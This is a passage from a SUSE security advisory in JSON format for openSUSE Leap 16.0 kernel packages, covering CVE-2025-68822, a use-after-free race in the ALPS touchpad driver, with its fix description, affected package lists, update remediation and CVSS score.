"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68821"
},
{
"cve": "CVE-2025-68822",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68822"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: alps - fix use-after-free bugs caused by dev3_register_work\n\nThe dev3_register_work delayed work item is initialized within\nalps_reconnect() and scheduled upon receipt of the first bare\nPS/2 packet from an external PS/2 device connected to the ALPS\ntouchpad. During device detachment, the original implementation\ncalls flush_workqueue() in psmouse_disconnect() to ensure\ncompletion of dev3_register_work. However, the flush_workqueue()\nin psmouse_disconnect() only blocks and waits for work items that\nwere already queued to the workqueue prior to its invocation. Any\nwork items submitted after flush_workqueue() is called are not\nincluded in the set of tasks that the flush operation awaits.\nThis means that after flush_workqueue() has finished executing,\nthe dev3_register_work could still be scheduled. Although the\npsmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),\nthe scheduling of dev3_register_work remains unaffected.\n\nThe race condition can occur as follows:\n\nCPU 0 (cleanup path) | CPU 1 (delayed work)\npsmouse_disconnect() |\n psmouse_set_state() |\n flush_workqueue() | alps_report_bare_ps2_packet()\n alps_disconnect() | psmouse_queue_work()\n kfree(priv); // FREE | alps_register_bare_ps2_mouse()\n | priv = container_of(work...); // USE\n | priv-\u003edev3 // USE\n\nAdd disable_delayed_work_sync() in alps_disconnect() to ensure\nthat dev3_register_work is properly canceled and prevented from\nexecuting after the alps_data structure has been deallocated.\n\nThis bug is identified by static analysis.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68822",
"url": "https://www.suse.com/security/cve/CVE-2025-68822"
},
{
"category": "external",
"summary": "SUSE Bug 1256668 for CVE-2025-68822",
"url": "https://bugzilla.suse.com/1256668"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
